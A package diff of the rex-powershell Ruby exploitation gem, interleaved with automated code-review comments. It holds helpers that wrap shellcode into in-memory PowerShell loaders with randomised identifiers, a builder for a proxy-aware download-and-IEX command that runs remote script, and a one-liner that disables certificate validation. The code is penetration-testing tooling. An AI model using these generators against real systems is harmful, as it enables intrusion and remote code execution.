rex-powershell 0.1.0

@@ -0,0 +1,78 @@
1
+ # -*- coding: binary -*-
2
+ require 'rex/random_identifier'
3
+
4
+ module Rex
5
+ module Powershell
6
+ module Payload
7
+
8
+ def self.read_replace_script_template(template_path, filename, hash_sub)
9
+ template_pathname = File.join(template_path, filename)
10
+ template = ''
11
+ File.open(template_pathname, "rb") {|f| template = f.read}
12
+ template % hash_sub
13
+ end
14
+
15
+ def self.to_win32pe_psh_net(template_path, code)
16
+ rig = Rex::RandomIdentifier::Generator.new()
17
+ rig.init_var(:var_code)
18
+ rig.init_var(:var_kernel32)
19
+ rig.init_var(:var_baseaddr)
20
+ rig.init_var(:var_threadHandle)
21
+ rig.init_var(:var_output)
22
+ rig.init_var(:var_codeProvider)
23
+ rig.init_var(:var_compileParams)
24
+ rig.init_var(:var_syscode)
25
+ rig.init_var(:var_temp)
26
+
27
+ hash_sub = rig.to_h
28
+ hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
29
+
30
+ read_replace_script_template(template_path, "to_mem_dotnet.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
31
+ end
32
+
33
+ def self.to_win32pe_psh(template_path, code)
34
+ hash_sub = {}
35
+ hash_sub[:var_code] = Rex::Text.rand_text_alpha(rand(8)+8)
36
+ hash_sub[:var_win32_func] = Rex::Text.rand_text_alpha(rand(8)+8)
37
+ hash_sub[:var_payload] = Rex::Text.rand_text_alpha(rand(8)+8)
38
+ hash_sub[:var_size] = Rex::Text.rand_text_alpha(rand(8)+8)
39
+ hash_sub[:var_rwx] = Rex::Text.rand_text_alpha(rand(8)+8)
40
+ hash_sub[:var_iter] = Rex::Text.rand_text_alpha(rand(8)+8)
41
+ hash_sub[:var_syscode] = Rex::Text.rand_text_alpha(rand(8)+8)
42
+
43
+ hash_sub[:shellcode] = Rex::Powershell.to_powershell(code, hash_sub[:var_code])
44
+
45
+ read_replace_script_template(template_path, "to_mem_old.ps1.template", hash_sub).gsub(/(?<!\r)\n/, "\r\n")
46
+ end
47
+
48
+ #
49
+ # Reflection technique prevents the temporary .cs file being created for the .NET compiler
50
+ # Tweaked by shellster
51
+ # Originally from PowerSploit
52
+ #
53
+ def self.to_win32pe_psh_reflection(template_path, code)
54
+ # Intialize rig and value names
55
+ rig = Rex::RandomIdentifier::Generator.new()
56
+ rig.init_var(:func_get_proc_address)
57
+ rig.init_var(:func_get_delegate_type)
58
+ rig.init_var(:var_code)
59
+ rig.init_var(:var_module)
60
+ rig.init_var(:var_procedure)
61
+ rig.init_var(:var_unsafe_native_methods)
62
+ rig.init_var(:var_parameters)
63
+ rig.init_var(:var_return_type)
64
+ rig.init_var(:var_type_builder)
65
+ rig.init_var(:var_buffer)
66
+ rig.init_var(:var_hthread)
67
+
68
+ hash_sub = rig.to_h
69
+ hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)
70
+
71
+ read_replace_script_template(template_path,
72
+ "to_mem_pshreflection.ps1.template",
73
+ hash_sub).gsub(/(?<!\r)\n/, "\r\n")
74
+ end
75
+
76
+ end
77
+ end
78
+ end
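Review bot: `Rex::Text` is used in all three `to_win32pe_psh*` methods (`Rex::Text.encode_base64`, `Rex::Text.rand_text_alpha`), but the file requires only `rex/random_identifier`, so loading it on its own raises NameError unless something else has already loaded rex-text; add `require 'rex/text'` next to the existing require. `to_win32pe_psh` also calls `Rex::Powershell.to_powershell`, which is not defined in this file and is presumably supplied by a sibling file, so the load order is worth confirming. Separately, `read_replace_script_template` applies `template % hash_sub`, which raises KeyError when a template references a name missing from the hash and ArgumentError on a stray `%`. A comment on that method such as `# Templates must escape literal percent signs as %% and may only reference keys present in hash_sub` would document the contract. None of the four methods carries the `@param`/`@return` documentation that the psh_methods file uses.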
@@ -0,0 +1,93 @@
1
+ # -*- coding: binary -*-
2
+
3
+ module Rex
4
+ module Powershell
5
+ ##
6
+ # Convenience methods for generating powershell code in Ruby
7
+ ##
8
+
9
+ module PshMethods
10
+ #
11
+ # Download file via .NET WebClient
12
+ #
13
+ # @param src [String] URL to the file
14
+ # @param target [String] Location to save the file
15
+ #
16
+ # @return [String] Powershell code to download a file
17
+ def self.download(src, target)
18
+ target ||= '$pwd\\' << src.split('/').last
19
+ %Q^(new-object System.Net.WebClient).DownloadFile("#{src}", "#{target}")^
20
+ end
21
+
22
+ #
23
+ # Uninstall app, or anything named like app
24
+ #
25
+ # @param app [String] Name of application
26
+ # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
27
+ # the application name
28
+ #
29
+ # @return [String] Powershell code to uninstall an application
30
+ def self.uninstall(app, fuzzy = true)
31
+ match = fuzzy ? '-like' : '-eq'
32
+ %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
33
+ end
34
+
35
+ #
36
+ # Create secure string from plaintext
37
+ #
38
+ # @param str [String] String to create as a SecureString
39
+ #
40
+ # @return [String] Powershell code to create a SecureString
41
+ def self.secure_string(str)
42
+ %Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$)
43
+ end
44
+
45
+ #
46
+ # Find PID of file lock owner
47
+ #
48
+ # @param filename [String] Filename
49
+ #
50
+ # @return [String] Powershell code to identify the PID of a file
51
+ # lock owner
52
+ def self.who_locked_file(filename)
53
+ %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
54
+ end
55
+
56
+ #
57
+ # Return last time of login
58
+ #
59
+ # @param user [String] Username
60
+ #
61
+ # @return [String] Powershell code to return the last time of a user
62
+ # login
63
+ def self.get_last_login(user)
64
+ %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
65
+ end
66
+
67
+ #
68
+ # Disable SSL Certificate verification
69
+ #
70
+ # @return [String] Powershell code to disable SSL verification
71
+ # checks.
72
+ def self.ignore_ssl_certificate
73
+ '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
74
+ end
75
+
76
+ #
77
+ # Use the default system web proxy and credentials to download a URL
78
+ # as a string and execute the contents as PowerShell
79
+ #
80
+ # @param url [String] string to download
81
+ #
82
+ # @return [String] PowerShell code to download a URL
83
+ def self.proxy_aware_download_and_exec_string(url)
84
+ var = Rex::Text.rand_text_alpha(1)
85
+ cmd = "$#{var}=new-object net.webclient;"
86
+ cmd << "$#{var}.proxy=[Net.WebRequest]::GetSystemWebProxy();"
87
+ cmd << "$#{var}.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
88
+ cmd << "IEX $#{var}.downloadstring('#{url}');"
89
+ cmd
90
+ end
91
+ end
92
+ end
93
+ end
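Review bot: `secure_string` ends its template with `-Force$`; the trailing `$` looks like a typo and becomes part of the emitted command, so the line should read `%Q(ConvertTo-SecureString -string '#{str}' -AsPlainText -Force)`. That method, like `download`, `uninstall`, `who_locked_file`, `get_last_login` and `proxy_aware_download_and_exec_string`, interpolates its argument into a quoted PowerShell literal without escaping, so a value containing the closing quote changes the structure of the generated command. For the single-quoted cases doubling the quote (`str.gsub("'", "''")`) is enough; the double-quoted ones need the backtick, `$` and `"` handled, or a switch to single quotes. In `download`, `target ||= '$pwd\\' << src.split('/').last` only takes effect when a caller passes nil explicitly, because `target` has no default in the signature. The doc comment on `ignore_ssl_certificate` should state that the callback is process-wide and accepts every certificate for all later requests in that session.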
@@ -0,0 +1,96 @@
1
+ # -*- coding: binary -*-
2
+
3
+ require 'forwardable'
4
+
5
+ module Rex
6
+ module Powershell
7
+ class Script
8
+ attr_accessor :code
9
+ attr_reader :functions, :rig
10
+
11
+ include Output
12
+ include Parser
13
+ include Obfu
14
+ # Pretend we are actually a string
15
+ extend ::Forwardable
16
+ # In case someone messes with String we delegate based on its instance methods
17
+ # eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
18
+ def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
19
+ :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub, :dump, :match, :to_sym,
20
+ :enum_for, :display, :tr_s!, :freeze, :gsub!, :split, :rindex, :<<, :<=>, :+, :lstrip!,
21
+ :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
22
+ :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
23
+ :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
24
+ :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
25
+ :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
26
+ :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
27
+ :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
28
+ :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
29
+ :initialize_clone, :to_str, :to_enum, :tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
30
+ :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
31
+ :end_with?
32
+
33
+ def initialize(code)
34
+ @code = ''
35
+ @rig = Rex::RandomIdentifier::Generator.new
36
+
37
+ begin
38
+ # Open code file for reading
39
+ fd = ::File.new(code || '', 'rb')
40
+ while (line = fd.gets)
41
+ @code << line
42
+ end
43
+
44
+ # Close open file
45
+ fd.close
46
+ rescue Errno::ENAMETOOLONG, Errno::ENOENT
47
+ # Treat code as a... code
48
+ @code = code.to_s.dup # in case we're eating another script
49
+ end
50
+ @functions = get_func_names.map { |f| get_func(f) }
51
+ end
52
+
53
+ ##
54
+ # Class methods
55
+ ##
56
+
57
+ #
58
+ # Convert binary to byte array, read from file if able
59
+ #
60
+ # @param input_data [String] Path to powershell file or powershell
61
+ # code string
62
+ # @param var_name [String] Byte array variable name
63
+ #
64
+ # @return [String] input_data as a powershell byte array
65
+ def self.to_byte_array(input_data, var_name = Rex::Text.rand_text_alpha(rand(3) + 3))
66
+ # File will raise an exception if the path contains null byte
67
+ if input_data.include? "\x00"
68
+ code = input_data
69
+ else
70
+ code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
71
+ end
72
+
73
+ code = code.unpack('C*')
74
+ psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
75
+ lines = []
76
+ 1.upto(code.length - 1) do |byte|
77
+ if (byte % 10 == 0)
78
+ lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
79
+ else
80
+ lines.push ",0x#{code[byte].to_s(16)}"
81
+ end
82
+ end
83
+
84
+ psh << lines.join('') + "\r\n"
85
+ end
86
+
87
+ #
88
+ # Return list of code modifier methods
89
+ #
90
+ # @return [Array] Code modifiers
91
+ def self.code_modifiers
92
+ instance_methods.select { |m| m =~ /^(strip|sub)/ }
93
+ end
94
+ end # class Script
95
+ end
96
+ end
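Review bot: `initialize` opens its argument as a file path before treating it as script text and rescues only `Errno::ENAMETOOLONG` and `Errno::ENOENT`. Script text containing a NUL byte therefore raises ArgumentError (the case `to_byte_array` already guards with `include? "\x00"`), a directory name raises `Errno::EISDIR` on the first read, and the descriptor stays open if a read fails because `fd.close` is not in an `ensure`. Using the same `::File.file?` test as `to_byte_array` covers all three, as in the block below. Both methods still read from disk whenever the string happens to name an existing file, so the `@param` docs should say so for callers that pass text from outside, or a separate path-based constructor should be offered. `to_byte_array` also fails on empty input, where `code[0]` is nil and `nil.to_s(16)` raises.

```ruby
def initialize(code)
  @rig = Rex::RandomIdentifier::Generator.new
  text = code.to_s
  # File raises ArgumentError on a NUL byte, so test for it before touching the filesystem
  @code = if !text.include?("\x00") && ::File.file?(text)
            ::File.binread(text)
          else
            text.dup # in case we're eating another script
          end
  # … unchanged: @functions assignment …
end
```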
@@ -0,0 +1,5 @@
1
+ module Rex
2
+ module Powershell
3
+ VERSION = "0.1.0"
4
+ end
5
+ end
@@ -0,0 +1,27 @@
1
+ # coding: utf-8
2
+ lib = File.expand_path('../lib', __FILE__)
3
+ $LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
4
+ require 'rex/powershell/version'
5
+
6
+ Gem::Specification.new do |spec|
7
+ spec.name = "rex-powershell"
8
+ spec.version = Rex::Powershell::VERSION
9
+ spec.authors = ["David 'thelightcosine' Maloney"]
10
+ spec.email = ["DMaloney@rapid7.com"]
11
+
12
+ spec.summary = %q{Rex Powershell Utilities}
13
+ spec.description = %q{Ruby Exploitation(Rex) library for generating/manipulating Powershell scripts}
14
+ spec.homepage = "https://github.com/rapid7/rex-powershell"
15
+
16
+ spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
17
+ spec.bindir = "exe"
18
+ spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
19
+ spec.require_paths = ["lib"]
20
+
21
+ spec.add_development_dependency "bundler", "~> 1.12"
22
+ spec.add_development_dependency "rake", "~> 10.0"
23
+ spec.add_development_dependency "rspec", "~> 3.0"
24
+
25
+ spec.add_runtime_dependency 'rex-text'
26
+ spec.add_runtime_dependency 'rex-random_identifier'
27
+ end
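Review bot: The two runtime dependencies, `rex-text` and `rex-random_identifier`, are declared without a version constraint, so any future release of either gem, including a breaking or compromised one, satisfies the requirement at install time. A pessimistic bound such as `spec.add_runtime_dependency 'rex-text', '~> <TESTED_VERSION>'` (placeholder: use the version this release was tested against) narrows that. The spec also sets no `spec.license` although a LICENSE file is shipped, which leaves `licenses` empty in the published metadata and hinders automated licence checks. `spec.files` shells out to `git ls-files`, so a build from a source tarball without git metadata produces an empty file list; that deserves a comment above the line.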
metadata ADDED
@@ -0,0 +1,213 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: rex-powershell
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.1.0
5
+ platform: ruby
6
+ authors:
7
+ - David 'thelightcosine' Maloney
8
+ autorequire:
9
+ bindir: exe
10
+ cert_chain:
11
+ - |
12
+ -----BEGIN CERTIFICATE-----
13
+ MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
14
+ A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
15
+ b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
16
+ MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
17
+ YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
18
+ aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
19
+ jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
20
+ xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
21
+ 1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
22
+ snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
23
+ U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
24
+ 9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
25
+ BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
26
+ AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
27
+ yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
28
+ 38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
29
+ AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
30
+ DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
31
+ HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
32
+ -----END CERTIFICATE-----
33
+ - |
34
+ -----BEGIN CERTIFICATE-----
35
+ MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
36
+ A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
37
+ b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
38
+ MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
39
+ YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
40
+ IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
41
+ NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
42
+ o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
43
+ 0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
44
+ jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
45
+ STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
46
+ O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
47
+ Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
48
+ PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
49
+ bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
50
+ bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
51
+ MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
52
+ PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
53
+ kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
54
+ jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
55
+ 88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
56
+ fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
57
+ sGgOJO9K9gslJO8k
58
+ -----END CERTIFICATE-----
59
+ - |
60
+ -----BEGIN CERTIFICATE-----
61
+ MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
62
+ MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
63
+ VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
64
+ NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
65
+ c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
66
+ MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
67
+ CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
68
+ /Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
69
+ tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
70
+ 5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
71
+ edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
72
+ 8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
73
+ AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
74
+ Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
75
+ VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
76
+ bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
77
+ MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
78
+ ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
79
+ bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
80
+ w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
81
+ SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
82
+ YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
83
+ 1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
84
+ mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
85
+ 2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
86
+ QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
87
+ -----END CERTIFICATE-----
88
+ date: 2016-06-21 00:00:00.000000000 Z
89
+ dependencies:
90
+ - !ruby/object:Gem::Dependency
91
+ name: bundler
92
+ requirement: !ruby/object:Gem::Requirement
93
+ requirements:
94
+ - - "~>"
95
+ - !ruby/object:Gem::Version
96
+ version: '1.12'
97
+ type: :development
98
+ prerelease: false
99
+ version_requirements: !ruby/object:Gem::Requirement
100
+ requirements:
101
+ - - "~>"
102
+ - !ruby/object:Gem::Version
103
+ version: '1.12'
104
+ - !ruby/object:Gem::Dependency
105
+ name: rake
106
+ requirement: !ruby/object:Gem::Requirement
107
+ requirements:
108
+ - - "~>"
109
+ - !ruby/object:Gem::Version
110
+ version: '10.0'
111
+ type: :development
112
+ prerelease: false
113
+ version_requirements: !ruby/object:Gem::Requirement
114
+ requirements:
115
+ - - "~>"
116
+ - !ruby/object:Gem::Version
117
+ version: '10.0'
118
+ - !ruby/object:Gem::Dependency
119
+ name: rspec
120
+ requirement: !ruby/object:Gem::Requirement
121
+ requirements:
122
+ - - "~>"
123
+ - !ruby/object:Gem::Version
124
+ version: '3.0'
125
+ type: :development
126
+ prerelease: false
127
+ version_requirements: !ruby/object:Gem::Requirement
128
+ requirements:
129
+ - - "~>"
130
+ - !ruby/object:Gem::Version
131
+ version: '3.0'
132
+ - !ruby/object:Gem::Dependency
133
+ name: rex-text
134
+ requirement: !ruby/object:Gem::Requirement
135
+ requirements:
136
+ - - ">="
137
+ - !ruby/object:Gem::Version
138
+ version: '0'
139
+ type: :runtime
140
+ prerelease: false
141
+ version_requirements: !ruby/object:Gem::Requirement
142
+ requirements:
143
+ - - ">="
144
+ - !ruby/object:Gem::Version
145
+ version: '0'
146
+ - !ruby/object:Gem::Dependency
147
+ name: rex-random_identifier
148
+ requirement: !ruby/object:Gem::Requirement
149
+ requirements:
150
+ - - ">="
151
+ - !ruby/object:Gem::Version
152
+ version: '0'
153
+ type: :runtime
154
+ prerelease: false
155
+ version_requirements: !ruby/object:Gem::Requirement
156
+ requirements:
157
+ - - ">="
158
+ - !ruby/object:Gem::Version
159
+ version: '0'
160
+ description: Ruby Exploitation(Rex) library for generating/manipulating Powershell
161
+ scripts
162
+ email:
163
+ - DMaloney@rapid7.com
164
+ executables: []
165
+ extensions: []
166
+ extra_rdoc_files: []
167
+ files:
168
+ - ".gitignore"
169
+ - ".rspec"
170
+ - ".travis.yml"
171
+ - CODE_OF_CONDUCT.md
172
+ - Gemfile
173
+ - LICENSE
174
+ - README.md
175
+ - Rakefile
176
+ - bin/console
177
+ - bin/setup
178
+ - lib/rex/powershell.rb
179
+ - lib/rex/powershell/command.rb
180
+ - lib/rex/powershell/function.rb
181
+ - lib/rex/powershell/obfu.rb
182
+ - lib/rex/powershell/output.rb
183
+ - lib/rex/powershell/param.rb
184
+ - lib/rex/powershell/parser.rb
185
+ - lib/rex/powershell/payload.rb
186
+ - lib/rex/powershell/psh_methods.rb
187
+ - lib/rex/powershell/script.rb
188
+ - lib/rex/powershell/version.rb
189
+ - rex-powershell.gemspec
190
+ homepage: https://github.com/rapid7/rex-powershell
191
+ licenses: []
192
+ metadata: {}
193
+ post_install_message:
194
+ rdoc_options: []
195
+ require_paths:
196
+ - lib
197
+ required_ruby_version: !ruby/object:Gem::Requirement
198
+ requirements:
199
+ - - ">="
200
+ - !ruby/object:Gem::Version
201
+ version: '0'
202
+ required_rubygems_version: !ruby/object:Gem::Requirement
203
+ requirements:
204
+ - - ">="
205
+ - !ruby/object:Gem::Version
206
+ version: '0'
207
+ requirements: []
208
+ rubyforge_project:
209
+ rubygems_version: 2.4.8
210
+ signing_key:
211
+ specification_version: 4
212
+ summary: Rex Powershell Utilities
213
+ test_files: []